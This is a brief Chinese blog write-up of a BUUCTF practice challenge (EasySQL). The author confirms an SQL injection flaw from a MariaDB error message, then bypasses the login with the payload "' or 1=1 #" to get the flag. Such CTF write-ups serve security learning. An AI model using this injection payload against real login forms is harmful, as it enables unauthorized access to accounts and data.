[BUUCTF][Web][极客大挑战 2019]EasySQL 1

打开靶机对应的url

界面显示需要输入账号和密码

分别在两个输入框尝试加单引号尝试是否有sql注入的可能,比如

123'
发现两个框可以注入,因为报了个错误信息
 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1
这里我们知道后台使用的是mariadb,所以可以使用mysql的语法来搞它
尝试一波万能密码
123
123' or 1=1 #

Boom 居然flag就出来了,hahahah

image

posted @ 2022-12-07 17:40  明月照江江  阅读(24)  评论(0编辑  收藏  举报